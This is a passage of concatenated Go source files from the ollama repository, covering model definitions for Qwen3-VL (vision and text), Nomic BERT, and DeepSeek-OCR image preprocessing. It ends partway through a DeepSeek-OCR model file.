deepstackVisualEmbeds = make([]ml.Tensor, len(mi.Multimodal[1:])) for i, mm := range mi.Multimodal[1:] { deepstackVisualEmbeds[i] = ctx.Input().Zeros(mm.Tensor.DType(), hiddenStates.Shape()...) ctx.Forward(mm.Tensor.Copy(ctx, deepstackVisualEmbeds[i].View(ctx, mi.Index*deepstackVisualEmbeds[i].Stride(1), mm.Tensor.Dim(0)*mm.Tensor.Dim(1)))) } } positions := ctx.Input().FromInts(slices.Concat(positionSlice...), len(positionSlice[0])*len(positionSlice)) for i, layer := range m.TextModel.Layers { if m.Cache != nil { m.Cache.SetLayer(i) } var outputs ml.Tensor if i == len(m.TextModel.Layers)-1 { outputs = batch.Outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Options) if i < len(deepstackVisualEmbeds) { hiddenStates = hiddenStates.Add(ctx, deepstackVisualEmbeds[i]) } } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, 1e-06) return m.Output.Forward(ctx, hiddenStates), nil } func New(c fs.Config) (model.Model, error) { m := Model{ TextProcessor: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", false), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), TextModel: newTextModel(c), VisionModel: newVisionModel(c), ImageProcessor: newImageProcessor(c), } m.Cache = kvcache.NewCausalCache(func(ctx ml.Context, layer int, key, positions ml.Tensor) (ml.Tensor, error) { m.positionCache = nil positions = positions.Repeat(ctx, 1, 4).Reshape(ctx, -1) return m.Options.applyRotaryPositionEmbeddings(ctx, key, positions), nil }) return &m, nil } func init() { model.Register("qwen3vl", New) model.Register("qwen3vlmoe", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3vl/model_vision.go
model/models/qwen3vl/model_vision.go
package qwen3vl import ( "iter" "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) type VisionAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_out"` } func rotateHalf(ctx ml.Context, t ml.Tensor) ml.Tensor { x1 := t.Slice(ctx, 0, 0, t.Dim(0)/2, 1) x2 := t.Slice(ctx, 0, t.Dim(0)/2, t.Dim(0), 1).Contiguous(ctx) return x2.Scale(ctx, -1).Concat(ctx, x1, 0) } func applyRotaryPositionEmbeddings(ctx ml.Context, states, cos, sin ml.Tensor) ml.Tensor { return states.Mul(ctx, cos).Add(ctx, rotateHalf(ctx, states).Mul(ctx, sin)) } func (sa *VisionAttention) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts VisionOptions) ml.Tensor { query := sa.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, query.Dim(1)) query = applyRotaryPositionEmbeddings(ctx, query, cos, sin) key := sa.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, opts.headDim(), opts.numHeads, key.Dim(1)) key = applyRotaryPositionEmbeddings(ctx, key, cos, sin) value := sa.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), opts.numHeads, value.Dim(1)) attention := nn.Attention(ctx, query, key, value, math.Pow(float64(opts.headDim()), -0.5), nil) attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2)) return sa.Output.Forward(ctx, attention) } type VisionMLP struct { FC1 *nn.Linear `gguf:"linear_fc1"` FC2 *nn.Linear `gguf:"linear_fc2"` } func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts VisionOptions) ml.Tensor { return mlp.FC2.Forward(ctx, mlp.FC1.Forward(ctx, hiddenStates).GELU(ctx)) } type VisionEncoderLayer struct { Norm1 *nn.LayerNorm `gguf:"norm1"` Attention *VisionAttention Norm2 *nn.LayerNorm `gguf:"norm2"` MLP *VisionMLP `gguf:"mlp"` } func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts VisionOptions) ml.Tensor { residual := hiddenStates hiddenStates = e.Norm1.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.Attention.Forward(ctx, hiddenStates, cos, sin, opts) hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = e.Norm2.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.MLP.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type VisionOptions struct { hiddenSize, numHeads, patchSize, numChannels, spatialMergeSize, temporalPatchSize, gridPerSide int eps, ropeTheta float32 deepstackVisualIndexes []int32 mropeSections []int } func (o VisionOptions) headDim() int { return o.hiddenSize / o.numHeads } type VisionPatchMerger struct { Norm *nn.LayerNorm `gguf:"norm"` FC1 *nn.Linear `gguf:"linear_fc1"` FC2 *nn.Linear `gguf:"linear_fc2"` } func (m *VisionPatchMerger) Forward(ctx ml.Context, visionOutputs ml.Tensor, postshuffleNorm bool, opts VisionOptions) ml.Tensor { hiddenSize := opts.hiddenSize * opts.spatialMergeSize * opts.spatialMergeSize if postshuffleNorm { visionOutputs = visionOutputs.Reshape(ctx, hiddenSize, -1) } visionOutputs = m.Norm.Forward(ctx, visionOutputs, opts.eps) visionOutputs = visionOutputs.Reshape(ctx, hiddenSize, -1) return m.FC2.Forward(ctx, m.FC1.Forward(ctx, visionOutputs).GELU(ctx)) } type VisionPositionEmbedding struct { PositionEmbedding *nn.Embedding `gguf:"pos_embed"` } func makeSlice2D[T int32 | float32](n0, n1 int) iter.Seq[[]T] { return func(yield func([]T) bool) { for range n0 { if !yield(make([]T, n1)) { return } } } } func (m *VisionPositionEmbedding) Forward(ctx ml.Context, hiddenStates ml.Tensor, grid *Grid, opts VisionOptions) ml.Tensor { indexSlice := slices.Collect(makeSlice2D[int32](4, grid.Height*grid.Width)) weightSlice := slices.Collect(makeSlice2D[float32](4, grid.Height*grid.Width)) stepHeight := float32(opts.gridPerSide-1) / float32(grid.Height-1) stepWidth := float32(opts.gridPerSide-1) / float32(grid.Width-1) var i int for h := range grid.Height { for w := range grid.Width { y, x := float32(h)*stepHeight, float32(w)*stepWidth floorY, floorX := int32(y), int32(x) ceilY, ceilX := min(floorY+1, int32(opts.gridPerSide-1)), min(floorX+1, int32(opts.gridPerSide-1)) indexSlice[0][i] = floorY*int32(opts.gridPerSide) + floorX indexSlice[1][i] = floorY*int32(opts.gridPerSide) + ceilX indexSlice[2][i] = ceilY*int32(opts.gridPerSide) + floorX indexSlice[3][i] = ceilY*int32(opts.gridPerSide) + ceilX weightSlice[0][i] = (1 - (y - float32(floorY))) * (1 - (x - float32(floorX))) weightSlice[1][i] = (1 - (y - float32(floorY))) * (x - float32(floorX)) weightSlice[2][i] = (y - float32(floorY)) * (1 - (x - float32(floorX))) weightSlice[3][i] = (y - float32(floorY)) * (x - float32(floorX)) i++ } } indices := ctx.Input().FromInts(slices.Concat(indexSlice...), grid.Height*grid.Width*4) weights := ctx.Input().FromFloats(slices.Concat(weightSlice...), 1, grid.Height*grid.Width*4) n := hiddenStates.Dim(0) positionEmbeds := m.PositionEmbedding.Forward(ctx, indices) positionEmbeds = positionEmbeds.Mul(ctx, weights) positionEmbeds = positionEmbeds.Reshape(ctx, n, -1, 4) positionEmbedsChunks := positionEmbeds.Chunk(ctx, 2, 1) positionEmbeds = positionEmbedsChunks[0]. Add(ctx, positionEmbedsChunks[1]). Add(ctx, positionEmbedsChunks[2]). Add(ctx, positionEmbedsChunks[3]) positionEmbeds = positionEmbeds.Reshape(ctx, -1, grid.Width/opts.spatialMergeSize, opts.spatialMergeSize, grid.Height/opts.spatialMergeSize) positionEmbeds = positionEmbeds.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx, n, -1) return hiddenStates.Add(ctx, positionEmbeds) } type VisionModel struct { PatchEmbedding *nn.Conv3D `gguf:"patch_embed"` PositionEmbedding *VisionPositionEmbedding Layers []VisionEncoderLayer `gguf:"blk"` PatchMerger *VisionPatchMerger `gguf:"merger"` DeepstackMerger []*VisionPatchMerger `gguf:"deepstack_merger"` VisionOptions } func (m *VisionModel) positions(ctx ml.Context, grid *Grid) (_, _ ml.Tensor) { indices := ctx.Input().FromInts(slices.Collect(func(yield func(int32) bool) { for y := range grid.Height { for x := range grid.Width { if !yield(int32(y)) { return } if !yield(int32(x)) { return } } } }), grid.Width*grid.Height*2) indices = indices.Reshape(ctx, -1, grid.Width/m.spatialMergeSize, m.spatialMergeSize, grid.Height/m.spatialMergeSize) indices = indices.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) indices = indices.Reshape(ctx, -1) halfDim := m.headDim() / 2 maxGrid := max(grid.Height, grid.Width) frequencies := ctx.Input().FromFloats(slices.Collect(func(yield func(float32) bool) { ropeTheta := float64(m.ropeTheta) for i := range maxGrid { for j := range halfDim / 2 { if !yield(float32(i) / float32(math.Pow(ropeTheta, float64(j*2)/float64(halfDim)))) { return } } } }), halfDim/2, maxGrid) embeds := frequencies.Rows(ctx, indices) embeds = embeds.Reshape(ctx, halfDim, 1, -1) embeds = embeds.Concat(ctx, embeds, 0) return embeds.Cos(ctx), embeds.Sin(ctx) } // Forward computes the vision model for an input tensor func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor, grid *Grid) (ml.Tensor, []ml.Tensor) { pixelValues = pixelValues.Reshape(ctx, m.patchSize, m.patchSize, m.temporalPatchSize, -1) hiddenStates := m.PatchEmbedding.Forward(ctx, pixelValues, m.numChannels, m.patchSize, m.patchSize, m.temporalPatchSize, 0, 0, 0, 1, 1, 1) hiddenStates = m.PositionEmbedding.Forward(ctx, hiddenStates, grid, m.VisionOptions) cos, sin := m.positions(ctx, grid) deepstackStates := make([]ml.Tensor, len(m.deepstackVisualIndexes)) for i, layer := range m.Layers { hiddenStates = layer.Forward(ctx, hiddenStates, cos, sin, m.VisionOptions) if i := slices.Index(m.deepstackVisualIndexes, int32(i)); i >= 0 { deepstackStates[i] = m.DeepstackMerger[i].Forward(ctx, hiddenStates, true, m.VisionOptions) } } hiddenStates = m.PatchMerger.Forward(ctx, hiddenStates, false, m.VisionOptions) return hiddenStates, deepstackStates } // newVisionModel creates a new instance of the Qwen vision model func newVisionModel(c fs.Config) *VisionModel { deepstackVisualIndexes := c.Ints("vision.deepstack_visual_indexes") model := &VisionModel{ Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count", 32)), DeepstackMerger: make([]*VisionPatchMerger, len(deepstackVisualIndexes)), VisionOptions: VisionOptions{ hiddenSize: int(c.Uint("vision.embedding_length", 1280)), numHeads: int(c.Uint("vision.attention.head_count", 16)), patchSize: int(c.Uint("vision.patch_size", 14)), numChannels: int(c.Uint("vision.num_channels", 3)), eps: c.Float("vision.attention.layer_norm_epsilon", 1e-6), ropeTheta: c.Float("vision.rope.freq_base", 10000.0), spatialMergeSize: int(c.Uint("vision.spatial_merge_size", 2)), temporalPatchSize: int(c.Uint("vision.temporal_patch_size", 2)), gridPerSide: int(math.Sqrt(float64(c.Uint("vision.num_positional_embeddings", 2304)))), mropeSections: slices.Collect(func(yield func(int) bool) { for _, section := range c.Ints("mrope_sections", []int32{24, 20, 20}) { if !yield(int(section)) { return } } }), deepstackVisualIndexes: deepstackVisualIndexes, }, } return model }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3vl/model_text.go
model/models/qwen3vl/model_text.go
package qwen3vl import ( "cmp" "math" "slices" "strings" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" ) type TextOptions struct { hiddenSize, numHeads, numKVHeads, keyLength, valueLength int eps, ropeBase, ropeScale float32 mropeSections []int numExperts, numExpertsUsed int normTopKProb bool } func (o TextOptions) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim(), o.ropeBase, 1/float32(math.Sqrt(float64(o.ropeScale))), rope.WithInterleaveMRoPE(o.mropeSections), ) } type TextAttention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.RMSNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.RMSNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *TextAttention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor { batchSize := hiddenStates.Dim(1) query := sa.Query.Forward(ctx, hiddenStates) key := sa.Key.Forward(ctx, hiddenStates) value := sa.Value.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) query = sa.QueryNorm.Forward(ctx, query, opts.eps) key = sa.KeyNorm.Forward(ctx, key, opts.eps) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(opts.headDim())), cache) attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), batchSize) return sa.Output.Forward(ctx, attention) } type TextMLP interface { Forward(ml.Context, ml.Tensor, *TextOptions) ml.Tensor } type sparse struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (mlp *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routerLogits := mlp.Router.Forward(ctx, hiddenStates) routingWeights := routerLogits.Softmax(ctx) selectedExperts := routingWeights.TopK(ctx, opts.numExpertsUsed) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, selectedExperts) if opts.normTopKProb { routingWeights = routingWeights.Reshape(ctx, opts.numExpertsUsed, hiddenStates.Dim(1)) routingWeights = routingWeights.Div(ctx, routingWeights.SumRows(ctx)) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExpertsUsed, hiddenStates.Dim(1)) } hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) hiddenStates = mlp.Gate.Forward(ctx, hiddenStates, selectedExperts).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates, selectedExperts)) experts := mlp.Down.Forward(ctx, hiddenStates, selectedExperts) experts = experts.Mul(ctx, routingWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates } type dense struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ *TextOptions) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type TextLayer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` *TextAttention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` TextMLP } func (d *TextLayer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor { residual := hiddenStates hiddenStates = d.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.TextAttention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = d.MLPNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.TextMLP.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type TextModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Layers []TextLayer `gguf:"blk"` Options *TextOptions } var _ model.Model = (*Model)(nil) func newTextModel(c fs.Config) *TextModel { layers := make([]TextLayer, c.Uint("block_count")) for i := range layers { if strings.HasSuffix(c.String("general.architecture"), "moe") { layers[i].TextMLP = &sparse{} } else { layers[i].TextMLP = &dense{} } } m := TextModel{ Layers: layers, Options: &TextOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), normTopKProb: c.Bool("norm_top_k_prob", true), mropeSections: slices.Collect(func(yield func(int) bool) { for _, section := range c.Ints("mrope_sections", []int32{24, 20, 20}) { if !yield(int(section)) { return } } }), }, } return &m }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/nomicbert/model.go
model/models/nomicbert/model.go
package nomicbert import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor TokenEmbedding *nn.Embedding `gguf:"token_embd"` TypeEmbedding *nn.Embedding `gguf:"token_types"` TokenEmbeddingNorm *nn.LayerNorm `gguf:"token_embd_norm"` Layers []EncoderLayer `gguf:"blk"` Options } type Options struct { hiddenSize int numHeads int headDim int eps float32 poolingType pooling.Type normalize bool ropeFreqBase float32 // MoE specific options (used by v2 / MoE models only) numExperts int numExpertsUsed int moeEveryNLayers int } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim, o.ropeFreqBase, 1.0, rope.WithTypeNeoX()) } type EncoderLayer struct { *Attention AttentionNorm *nn.LayerNorm `gguf:"attn_output_norm"` FeedForward FeedForward MLPNorm *nn.LayerNorm `gguf:"layer_output_norm"` } type Attention struct { QKV *nn.Linear `gguf:"attn_qkv"` Output *nn.Linear `gguf:"attn_output"` } type FeedForward interface { Forward(ml.Context, ml.Tensor, *Options) ml.Tensor } type dense struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ *Options) ml.Tensor { hidden := mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hidden) } // denseGELU implements MLP with GELU activation for v2 MoE dense layers type denseGELU struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *denseGELU) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ *Options) ml.Tensor { return mlp.Down.Forward(ctx, mlp.Up.Forward(ctx, hiddenStates).GELU(ctx)) } // sparse implements MoE with expert routing type sparse struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (moe *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routerLogits := moe.Router.Forward(ctx, hiddenStates) routingWeights := routerLogits.Softmax(ctx) selectedExperts := routingWeights.TopK(ctx, opts.numExpertsUsed) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, selectedExperts) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) hiddenStates = moe.Up.Forward(ctx, hiddenStates, selectedExperts).GELU(ctx) experts := moe.Down.Forward(ctx, hiddenStates, selectedExperts) experts = experts.Mul(ctx, routingWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) typeEmbed := m.TypeEmbedding.Weight.Slice(ctx, 1, 0, 1, 1) hiddenStates = hiddenStates.Add(ctx, typeEmbed) hiddenStates = m.TokenEmbeddingNorm.Forward(ctx, hiddenStates, m.eps) positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) for _, layer := range m.Layers { hiddenStates = layer.Forward(ctx, hiddenStates, positions, &m.Options) } hiddenStates = m.poolingType.Forward(ctx, hiddenStates) if m.normalize { hiddenStates = hiddenStates.L2Norm(ctx, 1e-12) } return hiddenStates, nil } func (e *EncoderLayer) Forward(ctx ml.Context, hiddenStates ml.Tensor, positions ml.Tensor, opts *Options) ml.Tensor { residual := hiddenStates hiddenStates = e.Attention.Forward(ctx, hiddenStates, positions, opts) hiddenStates = hiddenStates.Add(ctx, residual) hiddenStates = e.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) residual = hiddenStates hiddenStates = e.FeedForward.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) hiddenStates = e.MLPNorm.Forward(ctx, hiddenStates, opts.eps) return hiddenStates } func (a *Attention) Forward(ctx ml.Context, hiddenStates ml.Tensor, positions ml.Tensor, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) qkv := a.QKV.Forward(ctx, hiddenStates) qkv = qkv.Reshape(ctx, opts.headDim, opts.numHeads*3, batchSize) chunks := qkv.Chunk(ctx, 1, opts.numHeads) query, key, value := chunks[0], chunks[1], chunks[2] query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(opts.headDim)), nil) attention = attention.Reshape(ctx, opts.hiddenSize, batchSize) return a.Output.Forward(ctx, attention) } func New(c fs.Config) (model.Model, error) { hiddenSize := int(c.Uint("embedding_length")) numHeads := int(c.Uint("attention.head_count")) headDim := hiddenSize / numHeads processor := model.NewWordPiece( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{ int32(cmp.Or( c.Uint("tokenizer.ggml.cls_token_id"), c.Uint("tokenizer.ggml.bos_token_id"), )), }, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", true), EOS: []int32{ int32(cmp.Or( c.Uint("tokenizer.ggml.separator_token_id"), c.Uint("tokenizer.ggml.eos_token_id"), )), }, }, false, ) blockCount := int(c.Uint("block_count")) moeEveryNLayers := int(c.Uint("moe_every_n_layers", 0)) layers := make([]EncoderLayer, blockCount) for i := range layers { if moeEveryNLayers > 0 { // Layer uses MoE if (i+1) % moe_every_n_layers == 0 if (i+1)%moeEveryNLayers == 0 { layers[i].FeedForward = &sparse{} } else { layers[i].FeedForward = &denseGELU{} } } else { layers[i].FeedForward = &dense{} } } return &Model{ TextProcessor: processor, Layers: layers, Options: Options{ hiddenSize: hiddenSize, numHeads: numHeads, headDim: headDim, eps: c.Float("attention.layer_norm_epsilon"), poolingType: pooling.Type(c.Uint("pooling_type")), normalize: c.Bool("normalize_embeddings", false), ropeFreqBase: c.Float("rope.freq_base", 1000.0), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), moeEveryNLayers: moeEveryNLayers, }, }, nil } func init() { model.Register("nomic-bert", New) model.Register("nomic-bert_embed", New) model.Register("nomic-bert-moe", New) model.Register("nomic-bert-moe_embed", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/imageprocessor.go
model/models/deepseekocr/imageprocessor.go
package deepseekocr import ( "bytes" "image" "image/color" "math" "slices" "golang.org/x/image/draw" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/model/imageproc" ) type ratio struct { x, y int } func ProcessImage(ctx ml.Context, bts []byte) (ml.Tensor, ml.Tensor, []int, error) { img, _, err := image.Decode(bytes.NewReader(bts)) if err != nil { return nil, nil, nil, err } minNum, maxNum, imageSize, baseSize := 2, 9, 640, 1024 var targetRatios []ratio for n := minNum; n <= maxNum; n++ { for i := 1; i <= n; i++ { for j := 1; j <= n; j++ { if i*j <= maxNum && i*j >= minNum && !slices.Contains(targetRatios, ratio{i, j}) { targetRatios = append(targetRatios, ratio{i, j}) } } } } targetRatio := findBestAspectRatio(targetRatios, img.Bounds().Dx(), img.Bounds().Dy(), imageSize) targetWidth, targetHeight := imageSize*targetRatio.x, imageSize*targetRatio.y blocks := targetRatio.x * targetRatio.y mean := imageproc.ImageNetStandardMean std := imageproc.ImageNetStandardSTD var patches []float32 resized := imageproc.Resize(img, image.Point{X: targetWidth, Y: targetHeight}, imageproc.ResizeBilinear) for i := range blocks { patch := image.NewRGBA(image.Rect(0, 0, imageSize, imageSize)) draw.Draw(patch, patch.Bounds(), resized, image.Point{ X: i % (targetWidth / imageSize) * imageSize, Y: i / (targetWidth / imageSize) * imageSize, }, draw.Over) patches = append(patches, imageproc.Normalize(patch, mean, std, true, true)...) } img = imageproc.CompositeColor(img, color.Gray{}) img = imageproc.Pad(img, image.Point{X: baseSize, Y: baseSize}, color.Gray{127}, draw.BiLinear) return ctx.Input().FromFloats(patches, imageSize, imageSize, 3, blocks), ctx.Input().FromFloats(imageproc.Normalize(img, mean, std, true, true), baseSize, baseSize, 3), []int{targetRatio.x, targetRatio.y}, nil } func findBestAspectRatio(targetRatios []ratio, width, height, imageSize int) ratio { bestDiff := math.MaxFloat64 best := ratio{1, 1} realRatio := float64(width) / float64(height) for _, target := range targetRatios { targetRatio := float64(target.x) / float64(target.y) diff := math.Abs(realRatio - targetRatio) if diff < bestDiff { bestDiff = diff best = target } else if diff == bestDiff { if float64(width*height) > 0.5*float64(imageSize*imageSize*best.x*best.y) { best = target } } } return best }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/model.go
model/models/deepseekocr/model.go
package deepseekocr import ( "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor Sam *samModel `gguf:"s"` Vision *visionModel `gguf:"v"` Text *textModel ImageNewline ml.Tensor `gguf:"mm.image_newline"` //nolint:misspell // this misspelling is upstream. fixing it breaks the model ViewSeperator ml.Tensor `gguf:"mm.view_seperator"` Projector *nn.Linear `gguf:"mm.layers"` } func (m *Model) EncodeMultimodal(ctx ml.Context, bts []byte) ([]input.Multimodal, error) { patches, original, crop, err := ProcessImage(ctx, bts) if err != nil { return nil, err } var outputs []ml.Tensor if true { // TODO: local features if sum(patches) != 0 samOutputs := m.Sam.Forward(ctx, patches) visionOutputs := m.Vision.Forward(ctx, patches, samOutputs) samOutputs = 